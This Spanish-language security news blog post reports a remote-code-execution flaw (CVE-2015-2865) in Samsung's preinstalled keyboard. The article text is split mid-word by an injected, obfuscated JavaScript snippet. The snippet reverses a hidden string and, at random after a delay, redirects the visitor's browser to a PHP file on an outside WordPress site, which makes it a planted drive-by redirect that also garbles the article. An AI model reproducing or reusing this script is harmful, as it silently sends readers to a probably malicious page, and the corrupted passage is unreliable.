Millones de dispositivos móviles Samsung gravemente vulnerables
Nada menos que 600 millones de dispositivos móviles de Samsung pueden ser vulnerables a un error grave que podría permitir a cibercriminales espiar a los usuarios.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok=rERlVd6N” alt=”” width=”800″ height=”600″ /></p>
<p>El riesgo incluye al smartphone Galaxy S6 recientemente lanzado.<br />
Esta vulnerabilidad se presenta en un teclado preinstalado que permite a un atacante ejecutar código de forma remota como usuario privilegiado (system).</p>
<p>Los atacantes pueden explotar la falla para acceder a los sensores y recursos como el GPS, la cámara y el micrófono. También pueden instalar aplicaciones maliciosas sin que el usuario se de cuenta y pueden alterar la forma en que otras aplicaciones funcionan en el teléfono. Es posible espiar los mensajes entrantes/salientes o las llamadas de voz y acceder a los da<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos personales como fotos y mensajes de texto.
La falla fue descubierta por el investigador de seguridad móvil de NowSecure, Ryan Welton, quien notificó a Samsung en diciembre de 2014. NowSecure también notificó al CERT, el cual asignó el CVE-2015-2865, también informó al equipo de seguridad de Google Android.
“Si bien Samsung comenzó a distribuir un parche para los operadores de redes móviles a principios de 2015, no se sabe si estos últimos han distribuido el parche a los dispositivos en su red”, dijo NowSecure.
“Además, es difícil determinar el número de usuarios de dispositivos móviles que siguen siendo vulnerables, dados los modelos de los dispositivos y el número de operadores de redes móviles a nivel mundial.”
Ver informacion original al respecto en Fuente:
http://www.seguridad.unam.mx/noticia/?noti=2358
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.